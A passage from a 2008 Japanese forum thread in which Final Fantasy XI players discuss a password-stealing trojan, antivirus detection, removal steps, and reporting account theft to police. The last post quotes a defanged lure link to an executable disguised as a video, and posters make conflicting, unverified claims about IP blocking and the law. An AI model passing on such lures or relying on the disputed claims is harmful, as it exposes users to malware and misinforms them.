VU終わったらメンバー登録からしなきゃない状態になりました。
寝ぼけてたんでしっかりと画面みないで押したんですが、
不思議な現象ですた。時間は午前2時頃だったと思います。
2垢目正常にインできることを確認、一応PS2でパスは変えました。
347既にその名前は使われています:2008/08/15(金) 20:04:39 ID:jWIcrhGw
相当古いソフトの方で入れて
ウェイいいイイイイイの方がでたとかw
348既にその名前は使われています:2008/08/15(金) 20:08:55 ID:du3tdCCK
カスペとかNODとかフリーアンチウィルスソフト使ってて削除方法がわからんて・・・

バスターとかサポセン使えるソフト使った方がいいんじゃないの
349既にその名前は使われています:2008/08/15(金) 20:09:56 ID:7I7hZCtW
>>342
引越しでネット切れてたので8月10日頃まで一切接続なしでした。
11にイン(確か12日)するまでにのぞいたサイトはヤフー、朝目、pixivくらいかと思われます。

>>343
VUはログイン直後でしたね。
350既にその名前は使われています:2008/08/15(金) 20:13:50 ID:INa/o3rB
次回からこのIDとPASSでオートログインする  っていう設定になってたら勝手にVUになるんじゃね。

その設定にした覚えが無いなら新しいウイルスの可能性もあるな
351既にその名前は使われています:2008/08/15(金) 20:36:44 ID:JDKwDrbx
>>344
それは挙動に対してのアラートだからねー。
svchostは他のサービスプログラムから呼び出されて動くわけで。
現時点の限られた情報だけではその親サービスがナニなってる可能性もあるかもねってしか言えないなー。
というか。カスペルさんでHDD全スキャンしてみた?
352既にその名前は使われています:2008/08/15(金) 20:42:50 ID:2FOBiNy3
svchostを無効にしちゃえばいいんだろうけど、どんな影響が出てくるのやら・・・
353既にその名前は使われています:2008/08/15(金) 21:04:09 ID:PXb41IGn
フレがリアルタイムでハック食らってて吹いた
354既にその名前は使われています:2008/08/15(金) 21:35:09 ID:YUY83+SR
ふう、ようやくカスペルの完全スキャンオワタ
KarnaeghDrv.dllだけじゃなくて他にもウイルスみつかた;;
今日は3つくらいセキュリティソフト入れなおして反応しなかったのになぁ
カスペルスキーって結構優秀なんですね
355既にその名前は使われています:2008/08/15(金) 21:48:27 ID:965/EE1i
15日版のKarnaeghDrv.dllはカスペのプロセスを見つけると何かするかも。
このバージョンはlineage2をターゲットにしているようだけど、今後どうなることか。
356既にその名前は使われています:2008/08/15(金) 22:11:35 ID:1vVPkxy8
>>354
優秀すぎて2年分契約しました
2年で7940円なら安いもんだぜ
357既にその名前は使われています:2008/08/15(金) 23:21:17 ID:chx+t+9S
フォルダ見たけど、xeroxじゃなくてXEROXと大文字なんだが…。これはアウト?
xEROxみたいにxが小文字ではないんだが。
358既にその名前は使われています:2008/08/15(金) 23:31:23 ID:k6XG7TrH
あのね。ファイルやフォルダを新規作成すればわかるけど
AAAAとaaaaは共存できないの。つまり大文字小文字関係ないの。
359既にその名前は使われています:2008/08/15(金) 23:31:54 ID:9Misv5h8
体の一部がハックハック!ハックハック!
360既にその名前は使われています:2008/08/15(金) 23:36:43 ID:chx+t+9S
>>358
すいません。初心者なものでして。文字関係ないという事は、上で書かれてる様に
XPなら標準装備で心配ないという事でしょうか?



突然の指摘で焦ったもので。。
361既にその名前は使われています:2008/08/15(金) 23:55:11 ID:D2s4LUm3
xEROxのxは2バイト文字
362既にその名前は使われています:2008/08/16(土) 00:21:43 ID:zJhK+zaE
検出率だけみるならカスペなんだろうが、総合的なセキュリティ考えるとノートンとかなんだよね。
っていうかバスターでもカスペよりは良いし・・・
カスペがもうちょっとウイルススキャン以外にも目を向けてくれたら買うんだけど・・・
あるいは親和性が高い別機能特化のソフトがあれば良いんだけど、競合するからな。
すべてのセキュリティソフトは機能別にon/offできるようにしてほしい。
363既にその名前は使われています:2008/08/16(土) 00:27:06 ID:qmwBd4Ez
>>362
この流れでなんでいきなりセキュソフトについて語ってるわけ?
セキュ板にでもいけば?
364既にその名前は使われています:2008/08/16(土) 00:31:46 ID:uLXvSjCZ
十中八九感染したので報告。
ウィルスソフト:バスター2008
フラッシュ:最新版
Pol起動時に不明な変更で度々ブロック。
FF中にパスを外部に送信されそうになってブロックがあった。
おかしいなと思ったことは一時期からFFが重くなった。
バスターではウィルス発見されず。
これからカスペのオンラインスキャンしてきます。
ウィルスソフト入れてFlashも最新版だからって安心しないほうがいい。
バスター使いは個人情報保護項目でパスを外部に漏らさないように確実に設定を。
365既にその名前は使われています:2008/08/16(土) 00:34:07 ID:+0IE4ZMs
>>360
近頃のハック関連はね。今後は判らん
ここの情報を鵜呑みにしないで調べる癖を付けとくといいぞ
366既にその名前は使われています:2008/08/16(土) 00:36:01 ID:Z/TjMW/M
>>362
FWならなおさら差が付くけど何言ってんだか。
ttp://www.matousec.com/projects/firewall-challenge/results.php
セキュ板にお帰りください。
367既にその名前は使われています:2008/08/16(土) 00:40:09 ID:+0IE4ZMs
>>364
警告したいのは判ったが情報が足りない
>>6に従って纏め直してくれ
368既にその名前は使われています:2008/08/16(土) 00:40:18 ID:4WtF2MjS
やべーなんか不安になってきた
カスペのオンラインスキャンってウィルスソフトでオフラインでスキャンするのより時間かかる?
369既にその名前は使われています:2008/08/16(土) 00:44:49 ID:Z/TjMW/M
>>368
すんげー時間かかるからスキャンして寝るがよろし。
2回目以降ならファイル情報キャッシュするから速いんだけど
オンラインスキャンじゃどうだったかなぁ。
370既にその名前は使われています:2008/08/16(土) 00:45:05 ID:+0IE4ZMs
大差ない。つか時間を惜しんでどうする?
371既にその名前は使われています:2008/08/16(土) 00:45:16 ID:4WtF2MjS
>>369
さんくす
やってみるは
372既にその名前は使われています:2008/08/16(土) 00:46:14 ID:qqPYDUJY
スレチだけど中華共になんかお灸を据える方法ないの?フレが垢ハックの被害受けて引退してマジ許せん
373既にその名前は使われています:2008/08/16(土) 00:47:47 ID:Z/TjMW/M
>>372
田代と言いたいが、あぼーんされるからなぁ。
言っちゃなんだがウンコがあるからハエがたかるわけで、
RMTしない・RMTした奴を晒してハブるくらいじゃね?
374既にその名前は使われています:2008/08/16(土) 00:49:42 ID:bgfTFsLF
ゲーム内でツール使って稼ぐのと違って、垢ハックって犯罪だよね?
詳しくないからよくわからないけど、つきとめて罪に問うことってできないのかな。
375既にその名前は使われています:2008/08/16(土) 00:53:51 ID:2mkXpsKB
>>374お前に根気と金が有るなら出来る。
376既にその名前は使われています:2008/08/16(土) 00:54:35 ID:0xfyVFfs
中国が協力する訳がない。
377既にその名前は使われています:2008/08/16(土) 00:58:22 ID:bgfTFsLF
どうやって判明させるものなん?
378既にその名前は使われています:2008/08/16(土) 01:04:45 ID:FiQFq8bK
はやくFLASH更新してくれadobe・・・・・こわくてたまらん;;
379既にその名前は使われています:2008/08/16(土) 01:05:22 ID:qWc24VrS
たかがゲームでこんなにびくびくさせられるとはなw
380既にその名前は使われています:2008/08/16(土) 01:22:13 ID:zJhK+zaE
>>366
他にも機能があるだろうに・・・
FWとスキャンしか知らないんだな・・・
スキャン一つとっても比較対象は単純な検出能力だけじゃないよ。
381既にその名前は使われています:2008/08/16(土) 01:24:12 ID:bgfTFsLF
どうするのか純粋に知りたかっただけなんだけど、
書いちゃまずいことなんかな
382既にその名前は使われています:2008/08/16(土) 01:26:20 ID:+mDqdjWk
>>380
このスレに限っては特定のウイルスの検出能力が一番物を言うんだよ。
一般的なセキュリティよりも、ゲームのパス抜きウイルスに対しての
性能のほうが重要視される。
で、バスターは論外。>>111>>292も見つけられない
383既にその名前は使われています:2008/08/16(土) 01:27:44 ID:Z/TjMW/M
だめだこいつ
384既にその名前は使われています:2008/08/16(土) 01:29:58 ID:1IhTMKAF
>>380
セキュリティソフトには得手不得手があるわけだが、現時点でFFの垢パクの手法に対して総合的にカスペルさんが都合がいいってだけだろ。
何をそんなにこだわってんの?すきなのつかえばいいじゃんw
385既にその名前は使われています:2008/08/16(土) 01:30:02 ID:Z/TjMW/M
>>382
フォローすると初代(今月2日くらいの奴)は
ノートンよりバスターのが早かった。
その後のは全然だめだが(検体送ってんだぜ?)。
386既にその名前は使われています:2008/08/16(土) 01:30:04 ID:+mDqdjWk
>>381
たとえこっちの警察を動かすことができたとしても、相手が中国国内にいた場合は、
中国が日本からの捜査要請に絶対に協力してくれないからその時点でどうしようもない
ハッキング被害で警察に届け出た人は必ず言われるよ
387既にその名前は使われています:2008/08/16(土) 01:32:35 ID:U22SFD1Y
ハックって□e的にはすぐ見つけれないのかな?
ログたどれるわけだし、被害者のお金の送金先位わからないのかな?
388既にその名前は使われています:2008/08/16(土) 01:34:51 ID:4WtF2MjS
黒幕は




ヤス
389既にその名前は使われています:2008/08/16(土) 01:36:40 ID:bgfTFsLF
>>386
レスありがと。
相手が中国にいた場合は、実際に逮捕したりするのはあっちの国で〜って言うのはわかるんだけど、
それまでの過程が知りたかったんだよね。
IPのこととか接続に関することはとかさっぱりわからないからさ、どこまでが日本でわかる情報なのかとか。
「ここまでわかってるから後の捜査は頼むよ」って言うのか、
「突き止めたらおたくの国だったから逮捕よろしく」って言えるぐらいわかるのか。
390既にその名前は使われています:2008/08/16(土) 01:37:07 ID:BfIGi5kh
バスター使いはとりあえずカスペオンラインスキャン使っておけ、今すぐに。
391既にその名前は使われています:2008/08/16(土) 01:39:01 ID:zJhK+zaE
>>382
だから?
それを否定する気もないし、論点が分かってないだろ・・・

>>384
そういう話をしてるだけ。
別にカスペを否定してるわけじゃないんだが・・・
頭の悪い奴は自分が信奉するものにすこしでもケチが付くと顔真っ赤にするな〜ってことだろう。
FFのこと「だけ」考えてカスペ導入するようなら、FF専用機にでもした方が良いんじゃないの?
このスレに来てるとしても、殆どの人はFF以外の使用率の方が高いと思うんだが。
392既にその名前は使われています:2008/08/16(土) 01:40:13 ID:EF/pY4FE
http://changi.2ch.net/test/read.cgi/ogame/1216987350/964-965
あっちのスレだとあまり反応がなかったけど、
これってもうどうにもならんていうことだよね?
393既にその名前は使われています:2008/08/16(土) 01:40:46 ID:Z/TjMW/M
と、顔真っ赤にした頭の悪いノートン信者でした。
394既にその名前は使われています:2008/08/16(土) 01:42:08 ID:+mDqdjWk
>>389
実際に警察に行ったけど、警察がスクエニに要請して、該当アカウントに接続した
IP記録を取り寄せて調べてもらうことまではできる。
で、ハック犯と思しき接続元が中国IPだったら「もうこれ以上の追及はできませんねー」で打ち切られる
表現は悪いが相手が中国だと分かると最初からあきらめてる感じかな。
もちろん警察はやれるところまでやってくれたんだけど
395既にその名前は使われています:2008/08/16(土) 01:44:17 ID:G9falose
>>394
業者必死だな
中国からのIPは弾かれる様になったんだよ嘘付野郎
396既にその名前は使われています:2008/08/16(土) 01:45:07 ID:BfIGi5kh
>>395
kwsk
397 ◆vddkNh7Yho :2008/08/16(土) 01:47:29 ID:+mDqdjWk
>>395
どうも、去年10月に被害に遭って警察に行った報告者です。
特定の国からのアクセスを弾くようになったのはいつからでしたっけ?
398既にその名前は使われています:2008/08/16(土) 01:48:06 ID:Z/TjMW/M
399既にその名前は使われています:2008/08/16(土) 01:49:46 ID:1IhTMKAF
>>391
このスレでは一般的な用途で使用+FF11プレイの環境の人が多いんだと思うが。
その場合でもカスペルさんを真っ当に使えばそれほど問題があるとも思えないしなあ。
そりゃ上っていうか超強度目指したらカスペルさんとかでは厳しいものがあるし、それこそある程度以上のOSに対する知識も必要になってくるわけで。
俺はみんながカスペルさんが使おうと問題だとは思わないけどなw
むしろ何も解らないままcfpやらそこらへん使うほうがよっぽど怖いと思うわw
400既にその名前は使われています:2008/08/16(土) 01:49:52 ID:G9falose
日本国内のIPまたはGFEのIPでしかログインはできない。ちなみにFF11が遊べる国は日本からの要請で逮捕もしてくれる協定が結んである。
垢ハック自体は中国だろうが盗んだパスは日本の中華学生がネカフェからログインしてるんだろうな
401既にその名前は使われています:2008/08/16(土) 01:50:04 ID:bgfTFsLF
>>394
詳しくありがとう。
MMOとかやらない人から見たらうちらが失うのは「たかがゲームのデータ」だけど、
その結果大量の日本円が海外に流出してること、もっと大事に受け止めてほしいね
402既にその名前は使われています:2008/08/16(土) 01:50:08 ID:zJhK+zaE
>>393
機能別の細かい動きも知らない無知は黙ってろって。
だめなのも信者なのもお前のほうだろ?

ちなみに機能評価のためにメジャーな製品は殆ど持ってるが、
ノートンは一番欲しい機能がないから使ってないよ。
妄想が激しい信者は手に負えないね。
403既にその名前は使われています:2008/08/16(土) 01:50:13 ID:0TDZDaBV
セキュリティソフトは、使いこなせなければなに入れてても同じ
カスペルスキーの検出力は確かにすごいけど、その半面で誤検出も多い
それに対応できなければ、カスペルスキーを使うのは避けたほうがいいと思うし
誤検出を避けて検出レベルを抑えれば、結局はほかのソフトと変わりがない
まぁ、なに使っててもウィルスには感染するわけで、セキュリティソフトがなにが
いいかを問題にするよりは、ウィルスに感染しない状況を自分で模索するほうが
先決だと思いますよ
404既にその名前は使われています:2008/08/16(土) 01:50:54 ID:BfIGi5kh
>>398

>一部接続元からのプレイオンラインへのログイン制限を行います。
って書いてあるんだけど、具体的にkwsk
405既にその名前は使われています:2008/08/16(土) 01:52:57 ID:5AJxP9YE
業者が日本でアパートかりて串パクって操作してる可能性もあるよね
まあどっちにしろ日本国内からアクセスしてたら逮捕はされると思うけど。
ちなみに君らが通報しない限り逮捕はされませんからね
406既にその名前は使われています:2008/08/16(土) 01:55:05 ID:zJhK+zaE
>>399
うん。
だからカスペを使うのが問題だなんて言ってない。
個人的には不満があるのでわざわざ購入しないってだけで。
好きなの使えばいいと思うし、俺に反論してるのは何が不満なんだか・・・
407既にその名前は使われています:2008/08/16(土) 01:56:08 ID:Z/TjMW/M
>>402
バスターとか言ってる時点でお里が知れるからセキュ板に帰れよ…。
408既にその名前は使われています:2008/08/16(土) 02:01:33 ID:zJhK+zaE
妄想クンはしつこいね
409既にその名前は使われています:2008/08/16(土) 02:02:31 ID:Zv41p5kd
■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
 不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!

※最近業者が行っても無駄だの馬鹿にされるだの
  逮捕されないために必死になってるので注意!

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。


■各都道府県警では既に不正アクセスに関する専門の対策室ができております
 泣き寝入りは絶対ダメ!お気軽にご相談を。
 http://www.npa.go.jp/cyber/localpolice/index.html
■警察庁サイバー対策室
 http://www.npa.go.jp/cyber/
410既にその名前は使われています:2008/08/16(土) 02:02:56 ID:DCyxkI7n
いちいち煽る奴ってなんなの?w
411既にその名前は使われています:2008/08/16(土) 02:03:14 ID:0TDZDaBV
日本国内に中国サーバが置かれて、それが摘発された事件があったのは
何年前になるでしょうか
確か、摘発されたのは福岡だったはず

6年前くらいかな
412既にその名前は使われています:2008/08/16(土) 02:04:01 ID:+mDqdjWk
>>409
だから昨日も言ったけどせめてあらかじめ電話くらいしなさいってばw
413既にその名前は使われています:2008/08/16(土) 02:05:48 ID:Zv41p5kd
■不正アクセスによる罰則

「他人のID・パスワード等」を盗用してアクセス制御されているコンピュータを電気通信回線を通じて不正に利用する行為(法第3条)
1年以下の懲役又は50万円以下の罰金(法第8条)

電気通信回線を通じて、アクセス制御されているコンピュータ等のセキュリティホールを突いて、アクセス制御されているコンピュータを不正に利用する行為(法第3条)
1年以下の懲役又は50万円以下の罰金(法第8条)

アクセス制御されているコンピュータを利用できる「他人のID・パスワード等」を、承諾なしに第三者に提供する行為(法第4条)
30万円以下の罰金(法第9条)
414既にその名前は使われています:2008/08/16(土) 02:06:19 ID:bBKtzxt9
zJhK+zaEの言ってる事も間違いじゃないがまあ、興奮するな
大手のアンチウィルスはこの手の特殊なウィルス(MMOユーザーのみが対象etc)に余り力を入れないのはしょうがないし

カスペみたいなソフトはそういうところもカバーしないと売れないわけで
ただ、バスターがダメでカスペが最高!てのはちょっと違うと思うがな
まあ、双方モチツケ
415既にその名前は使われています:2008/08/16(土) 02:07:10 ID:NUFL/SWx
>>405
そうなんだよな。
恥ずかしいし冷めたとかマンドクセとかで警察へ申請しない奴が居るんだよな。

今自由にさせておいたら盗んだ汚い金で良い人材を雇われたり、
機材を購入されて身の危険が及ぶような犯罪も激化してしまうんだろうな。
416既にその名前は使われています:2008/08/16(土) 02:07:32 ID:L6zUHjs6
ここに通報の仕方が載ってるから自分の住んでる都道府県警をクリックすればいい

http://www.npa.go.jp/cyber/localpolice/index.html
417既にその名前は使われています:2008/08/16(土) 02:07:34 ID:0TDZDaBV
>>413
「日本国内で犯罪が立証された場合」を付け加えないとだめですよ
中国からの不正アクセスには適用されません
418既にその名前は使われています:2008/08/16(土) 02:08:10 ID:BfIGi5kh
>>414
>バスターがダメでカスペが最高!
たしかにこれはあり得ないけど、
バスターで検知できないのがカスペで検知できるってのは重要な情報だと思うよ。
419既にその名前は使われています:2008/08/16(土) 02:09:19 ID:f28q3JYw
>>292のやつがまた更新されたみたい
ttp://www.virustotal.com/analisis/0027adc64f9e3105ed91f5abbf96fc1c
マメだねえ
420既にその名前は使われています:2008/08/16(土) 02:09:38 ID:ThwopqzB
>>417
中国、台湾、香港からはPOLに繋ぐことができない
あとはわかるな?
421既にその名前は使われています:2008/08/16(土) 02:11:26 ID:Z/TjMW/M
>>419
AntiVirとOneCareとNortonか…割とバラけるなぁ。
VBA32がずーっと捕獲してるな(ヒューリスティックだけど)。
422既にその名前は使われています:2008/08/16(土) 02:11:41 ID:0TDZDaBV
>>420
わかっても処罰する権限がないのです
わかりますか?
423既にその名前は使われています:2008/08/16(土) 02:12:52 ID:RataSGFf
>>422
業者必死ですね(笑)
日本語でお願いします(笑)
【わかりますか】?(笑)
424既にその名前は使われています:2008/08/16(土) 02:13:21 ID:BfIGi5kh
>>420
>中国、台湾、香港からはPOLに繋ぐことができない

無知な俺に教えてくれ。ソースはどこ?
425既にその名前は使われています:2008/08/16(土) 02:13:42 ID:8fM/asSf
>>420
でも全部遮断されてるのか?
それらの国からの接続の例があるんだけど。
フレが日本語の出来る香港人だけど普通に接続してるし。
426既にその名前は使われています:2008/08/16(土) 02:13:45 ID:0TDZDaBV
サイバー犯罪条約を知らない人がまだこのスレにもいますか
かなり前に出しましたが
427既にその名前は使われています:2008/08/16(土) 02:15:59 ID:+mDqdjWk
揚げ足取りになるけど、どの地域の接続を制限したっていう明言はされてないんだよね
それに業者が制限で一網打尽になったかというと普通に今たくさんログインしてるしなー
428既にその名前は使われています:2008/08/16(土) 02:17:29 ID:BfIGi5kh
ブロックしてる接続元を公開してるの?
429既にその名前は使われています:2008/08/16(土) 02:19:09 ID:0TDZDaBV
3回目、張っておきます

サイバー犯罪条約
ttp://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
430既にその名前は使われています:2008/08/16(土) 02:20:03 ID:Z/TjMW/M
地域丸ごとではなく、ハックした奴のIPをその都度denyしてんのかねぇ。
そりゃ終わらんわw
431既にその名前は使われています:2008/08/16(土) 02:20:15 ID:Fcgb3PM0
パス抜かれた
432既にその名前は使われています:2008/08/16(土) 02:39:26 ID:+0IE4ZMs
>>429
法について言いたいことは良く判った

「アカハックされたら警察に行くべきである」
これを肯定するのか否定するのかを教えてくれ

どうも否定してる様にしか見えん
433既にその名前は使われています:2008/08/16(土) 02:39:56 ID:BfIGi5kh
なんだw
業者は、3国の接続元を遮断されてるって思い込ませたいだけかw
434既にその名前は使われています:2008/08/16(土) 02:40:45 ID:0TDZDaBV
中国からの不正アクセスに関して、いまのところ日本国内からそれを処罰する
方策はなにもありません
このスレでそれを話題にはしないでください

★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
  別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●● http://changi.2ch.net/test/read.cgi/ogame/1216987350/

テンプレにも書きましたが、その話題は別スレでお願いします
435既にその名前は使われています:2008/08/16(土) 02:42:02 ID:fOwzhYdy
>>432

ここの※の所をよく読んでください


■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
 不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!

※最近業者が行っても無駄だの馬鹿にされるだの
  逮捕されないために必死になってるので注意!

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。


■各都道府県警では既に不正アクセスに関する専門の対策室ができております
 泣き寝入りは絶対ダメ!お気軽にご相談を。
 http://www.npa.go.jp/cyber/localpolice/index.html
■警察庁サイバー対策室
 http://www.npa.go.jp/cyber/
436既にその名前は使われています:2008/08/16(土) 02:43:03 ID:0TDZDaBV
>>432
ご自身の問題ですから、わたしから言うべきことはなにもありません
わたしだったら、迷うことなく警察に被害届けを出します
437既にその名前は使われています:2008/08/16(土) 02:44:11 ID:G2f7xbne
>>434
ここで話すべき事だと思うが?
あっ業者さんでしたかw深夜までご苦労様ですw
438既にその名前は使われています:2008/08/16(土) 02:47:52 ID:+0IE4ZMs
すまないが、その書き方は納得がいかない。

貴方がテンプレを書いた確証も無ければテンプレに従って議論してる保障も無い。
もちろん、貴方に言われるままにこちらが行動するすることもない。
439既にその名前は使われています:2008/08/16(土) 02:52:23 ID:0TDZDaBV
>>438
実際にこのスレを立てたのはわたしではありません
立てられないので、前スレでテンプレを出して立てていただきました
行動云々については、議論を避けます
440既にその名前は使われています:2008/08/16(土) 02:53:43 ID:+0IE4ZMs
>>436
ごめんなさい、同じIDかと思った。
肯定ですね。わかりました。
441既にその名前は使われています:2008/08/16(土) 02:55:40 ID:HR6gj8Vi
>>429
で、そのサイバー犯罪条約とやらは、中国は批准してるのかね?
442既にその名前は使われています:2008/08/16(土) 03:05:57 ID:eTSO6jRB
FFXIAHってさ、ads.ffxiah.comをhostsファイルで禁止にしとけばだいたいいいかな?
443既にその名前は使われています:2008/08/16(土) 04:13:27 ID:nFub+C0P
>>442
はい
444既にその名前は使われています:2008/08/16(土) 05:12:31 ID:f+OoKNna
鑑定スレを見に行ったら、PG2のMMORPGトロイリストが反応して送信ブロックしたんですが・・・
(2回見に行って2回とも反応したので鑑定スレに間違いないかと)
これって何が反応してるんだろう・・・どなたか分かる人いますか(´Д`;)ヾ
鑑定スレって危険なんでしょか? 壺使ってるから画像とか読み込んじゃうからかな・・;
445既にその名前は使われています:2008/08/16(土) 05:24:00 ID:1Qzgm2CV
>>444
janeとPG2では反応なし
jpg偽装のウイルスとかも鑑定されてるみたいだから、壺で画像を先に読み込むように
してるなら、危険だからやめたほうがいいと思う
446既にその名前は使われています:2008/08/16(土) 05:28:16 ID:vFr7+krQ
>>444
どこの鑑定スレか知りませんが、鑑定してもらうスレなので、
対策せず下手に見に行かないほうが良いと思います。

※PG2が反応したのであれば大丈夫かと思いますが。
447既にその名前は使われています:2008/08/16(土) 05:29:59 ID:f+OoKNna
そうでしたか・・・。あわててスレ閉じた時に、画像がちらりと見えていました。迂闊でした。
レスありがとうございます。
できれば次スレ立てる時に、1のテンプレ部分にそういう注意書きも載せて貰えると助かるかもです。URLの鑑定だけかと思っていましたのでOrz
448既にその名前は使われています:2008/08/16(土) 05:30:53 ID:f+OoKNna
見たのはこの1の末尾にある鑑定スレ18です。
449既にその名前は使われています:2008/08/16(土) 05:35:31 ID:EaYAjUTE
寝てる間にカスペルが反応してたから何かと思ったら
復元ポイントにTrojan-GameThief.Win32.OnLineGames.biuvがあった、、、、
しつこいなコイツ、、、主要なデータのバックアップ終わらなくて
クリーンインストールすぐにできないのがつらい@@
450既にその名前は使われています:2008/08/16(土) 05:39:17 ID:XPyKeBG1
「ハッカー攻撃の技術ない」米議員の被害指摘に中国
2008.6.13 00:37

 中国外務省の秦剛副報道局長は12日の定例記者会見で、
米下院議員が中国国内からとみられるハッカー攻撃を受けたと指摘した問題について、
「まさか発展途上国の中国がそうした高等技術を持っていると思っているのか。
私はまったく信じない」と述べ、強い不快感を表明

MSN産経ニュース
ttp://sankei.jp.msn.com/world/china/080613/chn0806130037001-n1.htm
451既にその名前は使われています:2008/08/16(土) 05:45:30 ID:XPyKeBG1
こんな国にまともな対応を求めるのは無理すぎだわ。
何でPCでゲームしたいだけなのに、こんな奴らを相手に苦労しなきゃいけないのやら。
452既にその名前は使われています:2008/08/16(土) 05:46:06 ID:JRl18vdP
>>450
なんつーかほんと政府頭わりーな。
453既にその名前は使われています:2008/08/16(土) 05:48:31 ID:0TDZDaBV
専ブラの「画像を先に読み込む」のは、設定で変更できますか?
専ブラを使ってないので教えてくださいm(_ _)m
454既にその名前は使われています:2008/08/16(土) 05:48:38 ID:+S+ESvg2
噂のKarnaeghDrv.dllで感染が発覚したのですが、どうやって消せばいいんでしょうか(´Д⊂)
該当するフォルダにいって検索しても見つからないんですが・・・
455既にその名前は使われています:2008/08/16(土) 05:58:04 ID:bBKtzxt9
>>453
スレ違い

>>454
クリリン
456既にその名前は使われています:2008/08/16(土) 05:59:19 ID:0TDZDaBV
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします

前スレ ●● RMT業者の垢ハックが多発している件36 ●● http://changi.2ch.net/test/read.cgi/ogame/1218621315/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
  別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●● http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
457既にその名前は使われています:2008/08/16(土) 06:00:00 ID:0TDZDaBV
次回テンプレは、これなら問題ないのかな
458既にその名前は使われています:2008/08/16(土) 06:01:48 ID:AULPU5KE
>>454
見つからないのに何故感染していると分かったのか?
459既にその名前は使われています:2008/08/16(土) 06:03:32 ID:0TDZDaBV
>>454
■「KarnaeghDrv.dll」がPCに存在するか調べる方法(1)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。
460既にその名前は使われています:2008/08/16(土) 06:05:23 ID:+S+ESvg2
>>455
はい('・ω・`)

>>458
カスペルのオンラインスキャン
461既にその名前は使われています:2008/08/16(土) 06:10:03 ID:AULPU5KE
>>460
コマンドプロンプトから
attrib c:\KarnaeghDrv.dll /s -s -h -r
(c:\は見つかったドライブ)
これやった後にそのフォルダ見に行ってみて
462既にその名前は使われています:2008/08/16(土) 06:12:58 ID:bBKtzxt9
>>454
どうせフォルダオプションいじってないだけだろ

この程度がわからないなら迷わずクリリン、レジとか触れないだろうし
463既にその名前は使われています:2008/08/16(土) 06:44:22 ID:+S+ESvg2
ありがとうございます。
先生達のやり方でファイル発見できました。
(隠しを含むすべてを検索するで表示できるのかと思ってました><)
で、発見できたのですが普通に削除できずどうしたものかと思っていて
しばらくしてからもう一度検索したらファイルが消えてました(?)
カスペルさんが知らないうちに駆除してくれたのかよくわかりませんが寝ますー。
ありがとうございましたm(__)m
464既にその名前は使われています:2008/08/16(土) 06:47:36 ID:EaYAjUTE
>>463
いやいや、、カスペルスキー入れてるの?
先ほどオンラインスキャンでみつけたとか書いてたからインストールしてるのかよくわからんが
ちゃんと完全スキャンをしたほうがいいよ
465既にその名前は使われています:2008/08/16(土) 06:52:28 ID:bBKtzxt9
マジレスしても無駄だろ、ほんと知識無いにしても程があるレベルだし調べないわじゃしょうがない

危機感の無さがありえないんだが
466既にその名前は使われています:2008/08/16(土) 07:03:18 ID:bgfTFsLF
まったくわからないうちは、調べてもわからないんだけどね
似たような事例を見つけても、実際自分と同じなのかどうかも判断できないし

しばらくしたら消えたってなんだろうね・・・
467既にその名前は使われています:2008/08/16(土) 07:07:31 ID:RvLx6bth
>>465
おまえリアルで嫌なことでもあったのか?
答える気がない、レスを見てイラつくならこのスレ見に来るなよw
468既にその名前は使われています:2008/08/16(土) 07:11:43 ID:bBKtzxt9
ウイルスの定義名がわかってるのにわからないとかありえないだろ
検知したソフトのHP行けば対応方法、削除方法全て載ってるのに

>>467
そっくりそのまま返すぞ、てかあれだけの情報じゃ誰も答えられないがな
469既にその名前は使われています:2008/08/16(土) 07:23:48 ID:+o1kzlZb
一晩で伸びたな、垢ハックの嵐が到来か?いや、単に夏が来たってだけかw
470既にその名前は使われています:2008/08/16(土) 07:39:04 ID:gj99/ws/
>>468
答えられないなら黙ってればいいだろw
煽って楽しんでる性悪だろ
471既にその名前は使われています:2008/08/16(土) 07:39:15 ID:bgfTFsLF
情報が足りないなら、何の情報が欠如しているせいで答えられないのか書いてあげたらいいじゃない・・・
472既にその名前は使われています:2008/08/16(土) 08:14:00 ID:+o1kzlZb
とりあえず、落ち着いてテンプレ読んでね。で良いんじゃないか?
473既にその名前は使われています:2008/08/16(土) 09:01:57 ID:wu1hDPk8
ある掲示板でこんな書き込みを見つけた。

1 名前:きゃん太  2008/08/07 01:50
※公式行った方が綺麗に見えるかも → //ff11ro■com/mov0033■exe

